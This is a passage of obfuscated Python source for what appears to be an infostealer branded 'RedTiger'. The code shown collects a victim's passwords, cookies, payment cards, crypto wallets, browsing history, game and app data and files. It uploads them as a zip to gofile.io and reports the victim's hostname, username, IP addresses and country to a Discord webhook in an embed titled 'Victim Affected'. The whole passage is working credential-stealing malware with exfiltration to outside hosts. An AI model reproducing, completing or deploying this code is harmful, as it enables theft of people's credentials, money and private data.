    if SARLBJUIRIVQCXCXIRRCKPBLHFQNZGRJIRNNZNFPTDIFZPMIPTSHEEJYAX != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Roblox Accounts   : {SARLBJUIRIVQCXCXIRRCKPBLHFQNZGRJIRNNZNFPTDIFZPMIPTSHEEJYAX}")

    if EVEBGMFNCZISLHWURZTVOFCVRZYWNRXCWDOKZOOHMCCOOVWTATICDKHCKZXQNOFEATIHMPTVUBGVFYISRDTJNLYDWBNNSW != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Passwords         : {EVEBGMFNCZISLHWURZTVOFCVRZYWNRXCWDOKZOOHMCCOOVWTATICDKHCKZXQNOFEATIHMPTVUBGVFYISRDTJNLYDWBNNSW}")

    if LYPWCPDVIDCGKYKCRZRTWJAMSXWNOIOCERTWZUJLUIKAFCUQTAWKOVGALDUEXWUENQQQTAUFSYIAECTPOACFEWVJNKKDVPIXG != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Cookies           : {LYPWCPDVIDCGKYKCRZRTWJAMSXWNOIOCERTWZUJLUIKAFCUQTAWKOVGALDUEXWUENQQQTAUFSYIAECTPOACFEWVJNKKDVPIXG}")

    if NFEXAEMPGGYEFRFQZGWLNECNEFVDHJFEGMNJJUUHXNDNXGTAZDKADZCXXLPFAATDXMPWGZHFUFEANZRTANISNBWHOIVRXDLYJ != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Cards             : {NFEXAEMPGGYEFRFQZGWLNECNEFVDHJFEGMNJJUUHXNDNXGTAZDKADZCXXLPFAATDXMPWGZHFUFEANZRTANISNBWHOIVRXDLYJ}")

    if ZMXSPIEQIAPIZAURQQBPTZGQTCBYPGKVLLGWKTHEXKQIRGCUNNRJGSFSOAFITLRWEI != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Browsing History  : {ZMXSPIEQIAPIZAURQQBPTZGQTCBYPGKVLLGWKTHEXKQIRGCUNNRJGSFSOAFITLRWEI}")

    if BNTMLWGLFFHEAJYVHZPAXIDRKPIUQBKUCZKKZDCFCAJCCRTDLKMASQUGPJEPBXBLVRXBT != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Download History  : {BNTMLWGLFFHEAJYVHZPAXIDRKPIUQBKUCZKKZDCFCAJCCRTDLKMASQUGPJEPBXBLVRXBT}")

    if QJVMSWWRKJNPSIYCGICDQMPNVDRAWKEDDPJQXKQHAGXOEWEJNMWEAGRGZNBLAXEQJLJSTBALPCZDHXYSIOYVYGUSHYH != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Extentions        : {QJVMSWWRKJNPSIYCGICDQMPNVDRAWKEDDPJQXKQHAGXOEWEJNMWEAGRGZNBLAXEQJLJSTBALPCZDHXYSIOYVYGUSHYH}")

    if PKLQUNDHVHGBANMMGYHMOVAVVRYMXNLYRVDOMRGCBHTAWMLZTA != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Wallets           : {PKLQUNDHVHGBANMMGYHMOVAVVRYMXNLYRVDOMRGCBHTAWMLZTA}")

    if OZPOYBUMRWOBRSRDOIEZAKSTBWNGQFLBDGEJCELVOEAYAPCEGWOCTTVD != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Game Launchers    : {OZPOYBUMRWOBRSRDOIEZAKSTBWNGQFLBDGEJCELVOEAYAPCEGWOCTTVD}")
    
    if QTLLCDKDUUDNVVEDYXAVIMDJGHBBOGZXBUHQMYYBEHLLQFDRCTDASOZBSLZXGSKXACMCMMCGXAYFOOUCFCBGFAABBBLLLFFCAWJS != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Apps              : {QTLLCDKDUUDNVVEDYXAVIMDJGHBBOGZXBUHQMYYBEHLLQFDRCTDASOZBSLZXGSKXACMCMMCGXAYFOOUCFCBGFAABBBLLLFFCAWJS}")
    
    if HADGGYUVASHYJSNSSPPLGAKRSMERULPYNTNNLSJCIKBZLUBTPIBQYFQNSBLMMJHSMWMQB != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Interesting Files : {HADGGYUVASHYJSNSSPPLGAKRSMERULPYNTNNLSJCIKBZLUBTPIBQYFQNSBLMMJHSMWMQB}")

FQDGYASXNBFMNLJUYZLUITYYSWUUHTZBHQTGAPJKBHJHPGFBBJYCAWYFTIPVQBTELEOSQIQMVZCRNIDGCFWWTX.seek(0)

try:
    try: CWKHUNSHPUPKJTIUXCPCVJSGNLLAAVEVCXGNWSEYFNSUMEAQRGKNCSWUVJIONOTOVDLSPIHX = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
    except: CWKHUNSHPUPKJTIUXCPCVJSGNLLAAVEVCXGNWSEYFNSUMEAQRGKNCSWUVJIONOTOVDLSPIHX = "store4"

    LCXDHVJEMDJIIXLWYSNRBDYAOQMQXNIHBZAATTHRYJCMCDERKXIOQKTZEOAYZXPYDTVNOYIGSAAFA = requests.post(
        f"https://{CWKHUNSHPUPKJTIUXCPCVJSGNLLAAVEVCXGNWSEYFNSUMEAQRGKNCSWUVJIONOTOVDLSPIHX}.gofile.io/uploadFile",
        files={"file": (f"RedTiger_{JZGNRRRESUPFDWRNUUCFHRMBEGFXURWSVRLOQUNRXKFREUAELHGDBUVIGTGGIUOFOPYFVBRMYYUDJAH.replace(' ', '_')}.zip", FQDGYASXNBFMNLJUYZLUITYYSWUUHTZBHQTGAPJKBHJHPGFBBJYCAWYFTIPVQBTELEOSQIQMVZCRNIDGCFWWTX)}
    )

    GCFEDHWAUZNOSWDMWLLAFXFYPOWSELMPTPLOUWFJJGTKNPUDNRHLURJEHRTEBMCGDNAHHLTPGVJNGYLUOAQEA = LCXDHVJEMDJIIXLWYSNRBDYAOQMQXNIHBZAATTHRYJCMCDERKXIOQKTZEOAYZXPYDTVNOYIGSAAFA.json()["data"]["downloadPage"]
except Exception as e:
    GCFEDHWAUZNOSWDMWLLAFXFYPOWSELMPTPLOUWFJJGTKNPUDNRHLURJEHRTEBMCGDNAHHLTPGVJNGYLUOAQEA = f"Error: {e}"

embed = discord.Embed(title="Victim Affected", color=DTBLRQRAKCSIBOMDLVGWJSQUXZUGUXZBTRIHXJGBJVTFBNBSNUOPYSDKBMEQELVYUNALMIFAMFNNSNAZINKRJMZAJJ
).add_field(
    inline=False,
    name="Summary of Information", 
    value=f"""```
Hostname    : {BPMIITVCHRWLPOLISIKNATHJWIDIAQOPQAFRAXBORRJPZEJNXGCPMRCOIPHUESTLUBWSSPSIGWGNBMALZZSIUHDLEAFZYG}
Username    : {JZGNRRRESUPFDWRNUUCFHRMBEGFXURWSVRLOQUNRXKFREUAELHGDBUVIGTGGIUOFOPYFVBRMYYUDJAH}
DisplayName : {JBKJMGRWOZYUUWFGAVGSHZABVRQMYEWOYOXUTEJGVDFZPNABBDFQRVUFO}
Ip Public   : {PSBUASDJQFMGVMPYFHAEVUVQSPZDDZPIQSCFHXNPWKQHZFZKLIFOTIWNNSPFZDRHGBOJTIISIVFQOGMFDK}
Ip Local    : {YKUATTHUYFBPMJVUDILLGEDXADLMYFGUSAYBNKSBCTCJJVKKFGJNZZOELQMNDODGTAYRJNVOLW}
Country     : {UVFWCFCSUVAAVZZVEVZHAGIYABQRHBMEDJUNLZHLIDVYPFCVKRQ}```"""
).add_field(
    inline=False,
    name="Stolen Information", 
    value=f"""```swift
{"\n".join(UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE)}```"""
).add_field(
    inline=False,
    name="Download Link", 
    value=f"""{GCFEDHWAUZNOSWDMWLLAFXFYPOWSELMPTPLOUWFJJGTKNPUDNRHLURJEHRTEBMCGDNAHHLTPGVJNGYLUOAQEA}"""
).set_footer(
    text=IMGJMYBWYJIGOHYXOAHOEPQTNFZFGUOMCHXIEZMBUOFIRQECWNXYNM, 
    icon_url=SLLMXQDMLWMFYFQXLYIGHEPEBRXNVBQKBDELZYEZPTRUMXOUVGQ
)

try:  
    SJFFKUQEGQTIBLHVLFEMNMXYMWUQETKJESZPYOOPSHHUNBSIUAP = discord.SyncWebhook.from_url(DRBVAYCBDJRZUPODFICQCDCGXHWLDNOHXNJHWDXFYHXHBNUJIRXRD)
    SJFFKUQEGQTIBLHVLFEMNMXYMWUQETKJESZPYOOPSHHUNBSIUAP.send(embed=embed, username=ROKFJWCSQOAYRPUMKMQDCSUBOCMXICBQFMDSDCRSMXZRXJNMFBWLMAQYEHARRBL, avatar_url=SLLMXQDMLWMFYFQXLYIGHEPEBRXNVBQKBDELZYEZPTRUMXOUVGQ)
except: pass


try: threading.Thread(target=BZQOLJPSDRPWZIBPTMKCOZAOZSPUCIINRGWRPRXFGOFHGJROPBJEGDMOBEOUWJZRGMNDVHOPMGQGWBXRZDSXODPB).start()
except: pass
try: threading.Thread(target=PDLHYKTLZTYTZENLYCBHCLWVJCDRUXJZHJLDOYRVFUZPGBMAAMVMPNIYCMVTGIMRSGDQMDLVMLDRYRFCNBYQNRPUNTSFUTWWBM).start()
except: pass
try: threading.Thread(target=XHEUMFFYZJOMXGLKYTOBSCMEXWXIBPEBDTDTECIJUXQMYABEHCAGREYKGRPNSTTYEL).start()
except: pass
try: threading.Thread(target=GJEWAUTIHXZGGDRWHOTGWJEWMENEILLGYIVBHPVCXZFJJKBJNUJIHEQHYKSZARGQOBCVIMVCVQMYGIFDESHWQ).start()
except: pass
try: threading.Thread(target=EBBQGEBBUKCCLIPHBKVGQWJIMNXDVQEUSXBXZOHDIHIUTXAXGAOIMAVITUUYXMNMHGCTZIMTQKL).start()
except: pass
try: threading.Thread(target=PNRXALMBVTDJPOKVWMDXFZJOFKKSNHIWEARYFLMCRBRFSYGRGWYBSVWCJYDRNJIMXWEIZCZGRLXLVTQYLAGQVHDUQIVY).start()
except: pass
try: threading.Thread(target=XQOQHVLXLGJPOLJWDAXZUTFWYJAVQMZMYGEPRKAZLQECPKAQEXBWZMIVGGPEFTUCLSTCQVHBVEWXKFXBQIJW).start()
except: pass
try: threading.Thread(target=YKBKKSEFLJEKNWCVDZWGMYABEXGSAHSRBCEYNEYDNUFVPJCHPGRWIBPJRTJLTUWVHVP).start()
except: pass
